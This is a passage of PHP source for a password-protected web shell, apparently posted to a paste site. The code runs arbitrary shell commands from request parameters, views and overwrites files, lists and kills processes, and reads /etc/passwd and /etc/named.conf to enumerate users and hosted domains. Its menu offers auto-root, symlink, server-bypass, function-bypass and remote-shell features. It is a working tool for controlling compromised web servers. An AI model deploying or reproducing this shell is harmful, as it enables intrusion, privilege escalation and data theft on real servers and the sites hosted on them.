  1531. <a href=\"?d=".$pwd."&amp;view=".$f."&amp;type=image\">image</a></td></tr>
  1532. </table>
  1533. ";
  1534. $t = "";
  1535. $iinfo = getimagesize($f);
  1536. if(substr($filn,-3,3) == "php") $t = "code";
  1537. if(is_array($iinfo)) $t = 'image';
  1538.  
  1539. if(isset($_REQUEST['type'])) $t = ss($_REQUEST['type']);
  1540.  
  1541. if($t=="image"){
  1542. $width = (int) $iinfo[0];
  1543. $height = (int) $iinfo[1];
  1544. $imginfo = "Image type = ( ".$iinfo['mime']." )<br />
  1545. Image Size = <span class=\"gaul\">( </span>".$width." x ".$height."<span class=\"gaul\"> )</span><br />";
  1546. if($width > 800){
  1547. $width = 800;
  1548. $imglink = "<p><a href=\"?d=".$pwd."&amp;img=".$filn."\" target=\"_blank\">
  1549. <span class=\"gaul\">[ </span>view full size<span class=\"gaul\"> ]</span></a></p>";
  1550. }
  1551. else $imglink = "";
  1552.  
  1553. $s_result .= "<div class=\"viewfilecontent\" style=\"text-align:center;\">".$imglink."
  1554. <img width=\"".$width."\" src=\"?d=".$pwd."&amp;img=".$filn."\" alt=\"\" style=\"margin:8px auto;padding:0;border:0;\" /></div>";
  1555.  
  1556. }
  1557. elseif($t=="code"){
  1558. $s_result .= "<div class=\"viewfilecontent\">";
  1559. $file = wordwrap(file_get_contents($f),160,"\n",true);
  1560. $buff = highlight_string($file,true);
  1561. $old = array("4C83AF","888888","87DF45","EEEEEE", "FF8000");
  1562. $new = array("4C83AF","888888", "87DF45", "EEEEEE" , "87DF45");
  1563. $buff = str_ireplace($old,$new, $buff);
  1564. $s_result .= $buff;
  1565. $s_result .= "</div>";
  1566. }
  1567. else {
  1568. $s_result .= "<div class=\"viewfilecontent\">";
  1569. $s_result .= nl2br(htmlentities(wordwrap(file_get_contents($f),160,"\n",true)));
  1570. $s_result .= "</div>";
  1571. }
  1572. }
  1573. elseif(is_dir($f)){
  1574. chdir($f);
  1575. $pwd = cp(getcwd());
  1576. $s_result .= showdir($pwd,$s_prompt,$s_win);
  1577. }
  1578.  
  1579. } // edit file
  1580. elseif(isset($_REQUEST['edit'])){
  1581. $f = ss($_REQUEST['edit']);
  1582. $fc = "";
  1583. $fcs = "";
  1584.  
  1585. if(is_file($f)) $fc = file_get_contents($f);
  1586. if(isset($_REQUEST['fcsubmit'])){
  1587. $fc = ssc($_REQUEST['fc']);
  1588. if($filez = fopen($f,"w")){
  1589. $time = date("d-M-Y H:i",time());
  1590. if(fwrite($filez,$fc)) $fcs = "file saved <span class=\"gaya\">@</span> ".$time;
  1591. else $fcs = "failed to save";
  1592. fclose($filez);
  1593. }
  1594. else $fcs = "permission denied";
  1595. }
  1596. $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
  1597. <textarea id=\"fc\" name=\"fc\" class=\"evalcode\">".htmlspecialchars($fc)."</textarea>
  1598. <p><input type=\"text\" class=\"inputz\" style=\"width:98%;\" name=\"edit\" value=\"".$f."\" /></p>
  1599. <p><input type=\"submit\" name=\"fcsubmit\" class=\"inputzbut\" value=\"Save !\" style=\"width:120px;height:30px;\" />
  1600. &nbsp;&nbsp;".$fcs."</p>
  1601. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  1602. </form>
  1603. ";
  1604.  
  1605. } // task manager
  1606. elseif(isset($_REQUEST['ps'])){
  1607. $s_result = "<table class=\"explore sortable\">";
  1608. if(!$s_win) $h = "ps -aux";
  1609. else $h = "tasklist /V /FO csv";
  1610. $wcount = 11;
  1611. $wexplode = " ";
  1612. if($s_win) $wexplode = "\",\"";
  1613.  
  1614.  
  1615. $res = exe($h);
  1616. if(trim($res)=='') $s_result .= "<p class=\"rs_result\">error: permission denied</p>";
  1617. else{
  1618. if(!$s_win) $res = preg_replace('#\ +#',' ',$res);
  1619.  
  1620. $psarr = explode("\n",$res);
  1621. $fi = true;
  1622. $tblcount = 0;
  1623.  
  1624. $check = explode($wexplode,$psarr[0]);
  1625. $wcount = count($check);
  1626.  
  1627. foreach($psarr as $psa){
  1628. if(trim($psa)!=''){
  1629. if($fi){
  1630. $fi = false;
  1631. $psln = explode($wexplode,$psa,$wcount);
  1632. $s_result .= "<tr><th>action</th>";
  1633. foreach($psln as $p){
  1634. $s_result .= "<th>".trim(trim(strtolower($p)),"\"")."</th>";
  1635. }
  1636. $s_result .= "</tr>";
  1637. }
  1638. else{
  1639. $psln = explode($wexplode,$psa,$wcount);
  1640. $s_result .= "<tr>";
  1641. $tblcount = 0;
  1642. foreach($psln as $p){
  1643. if(trim($p)=="") $p = "&nbsp;";
  1644. if($tblcount == 0){
  1645. $s_result .= "<td style=\"text-align:center;\"><a href=\"?ps&amp;d=".$pwd."&amp;pid=".trim(trim($psln[1]),"\"")."\">kill</a></td>
  1646. <td style=\"text-align:center;\">".trim(trim($p),"\"")."</td>";
  1647. $tblcount++;
  1648. }
  1649. else{
  1650. $tblcount++;
  1651. if($tblcount == count($psln)) $s_result .= "<td style=\"text-align:left;\">".trim(trim($p), "\"")."</td>";
  1652. else $s_result .= "<td style=\"text-align:center;\">".trim(trim($p), "\"")."</td>";
  1653. }
  1654. }
  1655. $s_result .= "</tr>";
  1656. }
  1657. }
  1658. }
  1659. $s_result .= "</table>";
  1660. }
  1661. }
  1662. else{
  1663. if(isset($_REQUEST['cmd'])){
  1664. $cmd = ss($_REQUEST['cmd']);
  1665. if(strlen($cmd) > 0){
  1666. if(preg_match('#^cd(\ )+(.*)$#',$cmd,$r)){
  1667. $nd = trim($r[2]);
  1668. if(is_dir($nd)){
  1669. chdir($nd);
  1670. $pwd = cp(getcwd());
  1671. $s_result .= showdir($pwd,$s_prompt,$s_win);
  1672. }
  1673. elseif(is_dir($pwd.$nd)){
  1674. chdir($pwd.$nd);
  1675. $pwd = cp(getcwd());
  1676. $s_result .= showdir($pwd,$s_prompt,$s_win);
  1677. }
  1678. else $s_result .= "<pre>".$nd." is not a directory"."</pre>";
  1679. }
  1680. else{
  1681. $s_r = htmlspecialchars(exe($cmd));
  1682. if($s_r != '') $s_result .= "<pre>".$s_r."</pre>";
  1683. else $s_result .= showdir($pwd,$s_prompt,$s_win);
  1684. }
  1685. }
  1686. else $s_result .= showdir($pwd,$s_prompt,$s_win);
  1687. }
  1688. else $s_result .= showdir($pwd,$s_prompt,$s_win);
  1689. }
  1690.  
  1691.  
  1692. // print useful info
  1693. $s_info = "<table class=\"headtbl\"><tr><td>".$s_software."</td></tr>";
  1694. $s_info .= "<tr><td>".$s_system."</td></tr>";
  1695. if($s_id != "") $s_info .= "<tr><td>".$s_id."</td></tr>";
  1696. $s_info .= "<tr><td>server ip : ".$s_server_ip."<span class=\"gaya\"> | </span>your ip : ".$s_my_ip."<span class=\"gaya\"> | </span>";
  1697.  
  1698.  
  1699.  
  1700. if($s_safemode) $s_info .= "safemode <span class=\"gaya\">ON</span><span class=\"gaya\"> | </span>";
  1701. else $s_info .= "safemode <span class=\"gaya\">OFF</span><span class=\"gaya\"> | </span>";
  1702.  
  1703. $s_info .= "<tr><td>Disabled PHP Functions: ";
  1704. if(''==($df=@ini_get('disable_functions'))){
  1705. $s_info .= "<span class=\"gaya\">NONE</span>" ;
  1706. }else{
  1707. $s_info .= '<font color=red>'.str_replace(',', ', ', $df).'</font>';
  1708. }
  1709. //$s_info .= '</td>';//here
  1710.  
  1711. $s_info .= "<span class=\"gaya\"> | </span> Time @ Server : ".date("d M Y H:i:s",time());
  1712. $s_info .= "
  1713. </td></tr>
  1714. <tr><td style=\"text-align:left;\">
  1715. <table class=\"headtbls\"><tr>
  1716. <td>".trim($letters)."</td>
  1717. <td>
  1718. <span id=\"chpwd\">
  1719. &nbsp;<a href=\"javascript:dragon('chpwd','chpwdform')\">
  1720. <img height=\"16px\" width=\"16px\" src=\"" . $_SERVER['PHP_SELF'] . "?favicon\" alt=\"Change\" style=\"vertical-align:middle;margin:6px 0;border:0;\" />
  1721. &nbsp;&nbsp;</a>".swd($pwd)."</span>
  1722. <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" style=\"margin:0;padding:0;\">
  1723. <span class=\"sembunyi\" id=\"chpwdform\">
  1724. &nbsp;<a href=\"javascript:dragon('chpwdform','chpwd');\">
  1725. <img height=\"16px\" width=\"16px\" src=\"" . $_SERVER['PHP_SELF'] . "?favicon\" alt=\"Change\" style=\"vertical-align:middle;margin:6px 0;border:0;\" />
  1726. </a>&nbsp;&nbsp;
  1727. <input type=\"hidden\" name=\"d\" class=\"inputz\" style=\"width:300px;\" value=\"".cp($pwd)."\" />
  1728. <input type=\"text\" name=\"view\" class=\"inputz\" style=\"width:300px;\" value=\"".$pwd."\" />
  1729. <input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"view file / folder\" />
  1730. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"dragon('chpwdform','chpwd');\" />
  1731. </form>
  1732. </span>
  1733. </td></tr>
  1734. </table>
  1735. </td></tr></table>";
  1736.  
  1737.  
  1738. }
  1739. function GetFolderName($p) {
  1740. $path = trim($p);
  1741. $path = substr_replace($path ,"",-1);
  1742.  
  1743. //$path = dirname($_SERVER['PHP_SELF']);
  1744. $position = strrpos($path,'/') + 1;
  1745. $p = substr($path,$position);
  1746. return $p;
  1747. }
  1748.  
  1749.  
  1750. function curPageURL() {
  1751. $pageURL = 'http';
  1752. if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
  1753. $pageURL .= "://";
  1754. if ($_SERVER["SERVER_PORT"] != "80") {
  1755. $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
  1756. } else {
  1757. $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  1758. }
  1759. return $pageURL;
  1760. }
  1761. function GetNamed(){
  1762. GLOBAL $postpage ;
  1763. GLOBAL $prepage ;
  1764. $lul = exe("cat /etc/named.conf");
  1765. if($lul == ""){
  1766. $lul = exe("cat /var/named/etc/named.conf");
  1767. }
  1768. $lul = str_replace("\n", "<br>", $lul);
  1769. $pattern = '/zone *"([^"]+)" *{/';
  1770.  
  1771. $FullResult = "";
  1772. if (!preg_match_all($pattern, $lul, $matches)) {
  1773. $s_result .= $matches;
  1774. }
  1775.  
  1776. foreach ($matches[1] as $colour){
  1777.  
  1778. $postpage .= '<a href="http://'. $colour. '" target="_blank">'. $colour."</a><br/>";
  1779. $FullResult .= '<option value="'. "$colour<br/>\n". '" selected>'. "$colour<br/>\n". '</option>';
  1780. }
  1781.  
  1782. $prepage .= '<form method="post" action="'.$_SERVER['PHP_SELF']. '"><p>Get User Path<br><select name="user">'. $FullResult .'</select><input type="submit" name="alic" value="Get!"></p>';
  1783.  
  1784. //$s_result .=$prepage. $postpage;
  1785. return $postpage. $prepage;
  1786. }
  1787.  
  1788.  
  1789. function getuserpath(){
  1790. GLOBAL $prepath ;
  1791. GLOBAL $postpath ;
  1792. $thedir = getcwd() ;
  1793. if (strpos($thedir,'html') !== false) {
  1794. $customdir = "html";
  1795. }
  1796. if (strpos($thedir,'web') !== false) {
  1797. $customdir = "web";
  1798. }
  1799. if (strpos($thedir,'www') !== false) {
  1800. $customdir = "www";
  1801. }
  1802. if (strpos($thedir,'htdocs') !== false) {
  1803. $customdir = "htdocs";
  1804. }
  1805. if (strpos($thedir,'httpdocs') !== false) {
  1806. $customdir = "httpdocs";
  1807. }
  1808. if (strpos($thedir,'public_html') !== false) {
  1809. $customdir = "public_html";
  1810. }
  1811. $passwd = fopen("/etc/passwd", "r");
  1812.  
  1813. if(!$passwd)
  1814. {
  1815. die("Can't open /etc/passwd. Terminating.");
  1816. }
  1817. $hit = false;
  1818.  
  1819. while(!feof($passwd))
  1820. {
  1821. $line = fgets($passwd, 4048);
  1822. $passwd_line = explode(':', $line);
  1823.  
  1824. $folder = $passwd_line[5];
  1825. $user = $passwd_line[0];
  1826. if($hit == true){
  1827. }else{
  1828. //
  1829. if ($user == trim(exe("whoami"))){
  1830. $prepath = str_replace(trim($user),"",trim($folder));
  1831. $postpath = $customdir;
  1832. $hit = true;
  1833. }
  1834. }
  1835. // Choose exec, system or passthrough
  1836. }
  1837.  
  1838. fclose($passwd);
  1839. }
  1840.  
  1841. function getBaseUrl()
  1842. {
  1843. $currentPath = $_SERVER['PHP_SELF'];
  1844. $pathInfo = pathinfo($currentPath);
  1845. $hostName = $_SERVER['HTTP_HOST'];
  1846. $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https://'?'https://':'http://';
  1847. return $protocol.$hostName.$pathInfo['dirname']. '/';
  1848. }
  1849. // OK now... thats the <brain>,, here comes the <head>
  1850. ?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML IHOS Transitional//EN"
  1851. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  1852.  
  1853. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  1854.  
  1855. <head>
  1856. <title><?php echo $s_title; ?></title>
  1857. <link rel="SHORTCUT ICON" href="<?php echo $_SERVER['PHP_SELF']."?favicon"; ?>" />
  1858.  
  1859. <style type="text/css"><?php echo gzinflate(base64_decode($style)); ?></style>
  1860.  
  1861. <script type="text/javascript" src="<?php echo $_SERVER['PHP_SELF']."?sorttable"; ?>"></script>
  1862. <script type="text/javascript">
  1863. function dragon(l,b){
  1864. if(document.getElementById(l)) document.getElementById(l).style.display = 'none';
  1865. if(document.getElementById(b)) document.getElementById(b).style.display = 'block';
  1866. if(document.getElementById(l + '_')) document.getElementById(l + '_').focus();
  1867. }
  1868. function init(){
  1869. <?php if(isset($_REQUEST['cmd'])) echo "if(document.getElementById('cmd')) document.getElementById('cmd').focus();"; ?>
  1870. }
  1871. function clickcmd(){
  1872. var buff = document.getElementById('cmd');
  1873. if(buff.value == '- shell command -') buff.value = '';
  1874. }
  1875. </script>
  1876.  
  1877. </head>
  1878. <script type="text/javascript">
  1879.  
  1880. /***********************************************
  1881. * IFrame SSI script II- ? Dynamic Drive DHTML code library (http://www.dynamicdrive.com)
  1882. * Visit DynamicDrive.com for hundreds of original DHTML scripts
  1883. * This notice must stay intact for legal use
  1884. ***********************************************/
  1885.  
  1886. //Input the IDs of the IFRAMES you wish to dynamically resize to match its content height:
  1887. //Separate each ID with a comma. Examples: ["myframe1", "myframe2"] or ["myframe"] or [] for none:
  1888. var iframeids=["myframe"]
  1889.  
  1890. //Should script hide iframe from browsers that don't support this script (non IE5+/NS6+ browsers. Recommended):
  1891. var iframehide="yes"
  1892.  
  1893. var getFFVersion=navigator.userAgent.substring(navigator.userAgent.indexOf("Firefox")).split("/")[1]
  1894. var FFextraHeight=parseFloat(getFFVersion)>=0.1? 16 : 0 //extra height in px to add to iframe in FireFox 1.0+ browsers
  1895.  
  1896. function resizeCaller() {
  1897. var dyniframe=new Array()
  1898. for (i=0; i<iframeids.length; i++){
  1899. if (document.getElementById)
  1900. resizeIframe(iframeids[i])
  1901. //reveal iframe for lower end browsers? (see var above):
  1902. if ((document.all || document.getElementById) && iframehide=="no"){
  1903. var tempobj=document.all? document.all[iframeids[i]] : document.getElementById(iframeids[i])
  1904. tempobj.style.display="block"
  1905. }
  1906. }
  1907. }
  1908.  
  1909. function resizeIframe(frameid){
  1910. var currentfr=document.getElementById(frameid)
  1911. if (currentfr && !window.opera){
  1912. currentfr.style.display="block"
  1913. if (currentfr.contentDocument && currentfr.contentDocument.body.offsetHeight) //ns6 syntax
  1914. currentfr.height = currentfr.contentDocument.body.offsetHeight+FFextraHeight;
  1915. else if (currentfr.Document && currentfr.Document.body.scrollHeight) //ie5+ syntax
  1916. currentfr.height = currentfr.Document.body.scrollHeight;
  1917. if (currentfr.addEventListener)
  1918. currentfr.addEventListener("load", readjustIframe, false)
  1919. else if (currentfr.attachEvent){
  1920. currentfr.detachEvent("onload", readjustIframe) // Bug fix line
  1921. currentfr.attachEvent("onload", readjustIframe)
  1922. }
  1923. }
  1924. }
  1925.  
  1926. function readjustIframe(loadevt) {
  1927. var crossevt=(window.event)? event : loadevt
  1928. var iframeroot=(crossevt.currentTarget)? crossevt.currentTarget : crossevt.srcElement
  1929. if (iframeroot)
  1930. resizeIframe(iframeroot.id);
  1931. }
  1932.  
  1933. function loadintoIframe(iframeid, url){
  1934. if (document.getElementById)
  1935. document.getElementById(iframeid).src=url
  1936. }
  1937.  
  1938. if (window.addEventListener)
  1939. window.addEventListener("load", resizeCaller, false)
  1940. else if (window.attachEvent)
  1941. window.attachEvent("onload", resizeCaller)
  1942. else
  1943. window.onload=resizeCaller
  1944.  
  1945. </script>
  1946. <body onLoad="init();">
  1947. <table id="main"><tr><td><?php if($s_auth){ ?>
  1948. <div><table id="header"><tr><td style="width:80px;"><table><tr><td><h1><a href="?"><?php echo $s_name; ?></a></h1></td></tr><tr><td
  1949. style="text-align:right;"><div class="ver"><?php echo $s_ver; ?></div></td></tr></table></td>
  1950. <td><div class="headinfo"><?php echo $s_info; ?></div></td></tr></table>
  1951. </div>
  1952. <div style="clear:both;"></div>
  1953. <div id="menu">
  1954. <table style="width:100%;"><tr>
  1955. <td><a href="?&d=<?php echo $pwd; ?>" title="Explorer"><div class="menumi">File Browser</div></a></td>
  1956. <td><a href="?ps&d=<?php echo $pwd; ?>" title="Display process status"><div class="menumi">Processes</div></a></td>
  1957. <td><a href="?eval&d=<?php echo $pwd; ?>" title="PHP eval function"><div class="menumi">eval</div></a></td>
  1958. <td><a href="?phpinfo&d=<?php echo $pwd; ?>" title="Information about current state of PHP"><div class="menumi">php</div></a></td>
  1959. <td><a href="?act=sql&d=<?php echo $pwd; ?>" title="Connect to database"><div class="menumi">SQL</div></a></td>
  1960. <td><a href="?expl&d=<?php echo $pwd; ?>" title="Auto Root Script"><div class="menumi">Root</div></a></td>
  1961.  
  1962. <td><a href="?syml" title="Auto Symlink Script"><div class="menumi">Symlink</div></a></td>
  1963. <td><a href="?svbp" title="Http Server Bypass, Read Files And Folders"><div class="menumi">Http Server Bypass</div></a></td>
  1964. <td><a href="?misc" title="Miscellaneous Commands"><div class="menumi">Misc</div></a></td>
  1965. <td><a href="?byps&d=<?php echo $pwd; ?>" title="Bypass Functions With .htaccess & php.ini"><div class="menumi">Bypass</div></a></td>
  1966.  
  1967. <td><a href="?rs&d=<?php echo $pwd; ?>" title="Remote Shell"><div class="menumi">Remote Shell</div></a></td>
  1968. <td style="width:100%;padding:0 0 0 6px;">
  1969. <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"><span class="prompt"><?php echo $s_prompt; ?></span>
  1970. <input id="cmd" onclick="clickcmd();" class="inputz" type="text" name="cmd" style="width:70%;" value="<?php
  1971. if(isset($_REQUEST['cmd'])) echo "";
  1972. else echo "- shell command -";
  1973. ?>" />
  1974. <noscript><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></noscript>
  1975. <input type="hidden" name="d" value="<?php echo $pwd; ?>" />
  1976. </form>
  1977. </td>
  1978. </tr>
  1979. </table>
  1980. </div>
  1981. <div id="content" id="box_shell">
  1982. <div id="result"><?php echo $s_result; ?></div>
  1983. </div><?php }
  1984. else{ ?>
  1985. <div style="width:100%;text-align:center;">
  1986.  
  1987. <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
  1988. <img src="?favicon" style="margin:2px;vertical-align:middle;" />
  1989. <?php echo $s_name; ?>&nbsp;<span class="gaya"><?php echo $s_ver; ?></span><input id="login" class="inputz" type="password" name="login" style="width:120px;"
  1990. value="" />
  1991. <input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" />
  1992. </form>
  1993. </div>
  1994.  
  1995. <?php
  1996. }
  1997. ?>
  1998. </td></tr></table>
  1999. <p class="footer">YAM 2012 &copy;<?php echo date("Y",time())." ".$s_name; ?></p>
  2000. </body>
  2001. </html>
Add Comment
Please, Sign In to add comment